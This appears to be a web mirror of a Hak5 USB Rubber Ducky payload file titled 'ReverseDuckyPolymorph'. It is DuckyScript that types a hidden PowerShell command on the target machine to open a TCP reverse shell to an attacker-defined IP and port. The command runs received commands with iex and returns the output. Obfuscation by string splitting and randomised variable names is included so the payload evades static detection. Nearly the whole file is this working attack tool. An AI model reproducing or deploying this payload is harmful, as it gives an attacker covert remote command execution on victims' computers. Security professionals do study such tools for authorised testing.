Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
2968 views
1
REM Title: ReverseDuckyPolymorph

2
REM Author: 0i41E, Korben

3
REM Version 1.1

4


5
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)

6
REM Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

7


8
REM Description:

9
REM TCP Reverse shell executed hidden in the background, 

10
REM the CAPSLOCK light at the end will indicate that the payload was executed.

11
REM Because of randomisation static detection will be impeded

12
REM DON'T FORGET TO START LISTENER BEFORE DEPLOYING ON TARGET

13


14
REM REQUIRED: Define the attackers IP & Port

15
DEFINE ADDRESS '0.0.0.0'

16
DEFINE PORT 4444

17


18
REM Extension DETECT_READY by Korben for best and fastest deployment

19
EXTENSION DETECT_READY

20
    REM VERSION 1.0

21


22
    REM USAGE:

23
    REM Extension runs inline (here)

24
    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic

25
    REM boot delay

26


27
    REM TARGETS:

28
    REM Any system that reflects CAPSLOCK will detect minimum required delay

29
    REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms

30


31
    REM CONFIGURATION:

32
    DEFINE RESPONSE_DELAY 25

33
    DEFINE ITERATION_LIMIT 120

34


35
    VAR $C = 0

36
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))

37
        CAPSLOCK

38
        DELAY RESPONSE_DELAY

39
        $C = ($C + 1)

40
    END_WHILE

41
    CAPSLOCK

42
END_EXTENSION

43


44
REM Variables for pseudo random variables

45
VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE

46
VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE 

47
VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE 

48
VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE

49
VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE

50
VAR $var_duckID = $_RANDOM_UPPER_LETTER_KEYCODE

51
VAR $var_duckID2 = $_RANDOM_NUMBER_KEYCODE

52
VAR $var_duckID3 = $_RANDOM_NUMBER_KEYCODE

53


54
DELAY 1500

55
GUI r

56
DELAY 500

57
STRINGLN powershell -NoP -NonI -w h

58
DELAY 500

59
STRING $

60
INJECT_VAR $var_gibberish

61
INJECT_VAR $var_gibberish2

62
INJECT_VAR $var_gibberish3

63
INJECT_VAR $var_gibberish4

64
STRING =[TyPE]('tExT'+'.enCOD'+'InG');$

65
INJECT_VAR $var_gibb3rish

66
REM Address and Port of the listening machine

67
STRING =.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$

68
INJECT_VAR $var_gibberish4

69
STRING =$

70
INJECT_VAR $var_gibb3rish

71
STRING .GetStream();[byte[]]$b=0..65535|&('%'){0};while(($

72
INJECT_VAR $var_gibberish4

73
INJECT_VAR $var_gibberish3

74
INJECT_VAR $var_gibberish

75
INJECT_VAR $var_duckID3

76
STRING =$

77
INJECT_VAR $var_gibberish4

78
STRING .Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$

79
INJECT_VAR $var_gibberish4

80
INJECT_VAR $var_gibberish3

81
INJECT_VAR $var_gibberish

82
INJECT_VAR $var_duckID3

83
STRING );$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky_

84
INJECT_VAR $var_duckID

85
INJECT_VAR $var_duckID2

86
INJECT_VAR $var_duckID3

87
STRING @PS '+(&('g'+'l'))+'> ';$

88
INJECT_VAR $var_duckID3

89
INJECT_VAR $var_gibberish2

90
INJECT_VAR $var_gibb3rish

91
STRING =($

92
INJECT_VAR $var_gibberish

93
INJECT_VAR $var_gibberish2

94
INJECT_VAR $var_gibberish3

95
INJECT_VAR $var_gibberish4

96
STRING ::ASCII).GetBytes($Z);$

97
INJECT_VAR $var_gibberish4

98
STRING .Write($

99
INJECT_VAR $var_duckID3

100
INJECT_VAR $var_gibberish2

101
INJECT_VAR $var_gibb3rish

102
STRING ,0,$

103
INJECT_VAR $var_duckID3

104
INJECT_VAR $var_gibberish2

105
INJECT_VAR $var_gibb3rish

106
STRING .Length);$

107
INJECT_VAR $var_gibberish4

108
STRING .Flush()};$

109
INJECT_VAR $var_gibb3rish

110
STRINGLN .Close();exit

111
DELAY 100

112
CAPSLOCK

113


114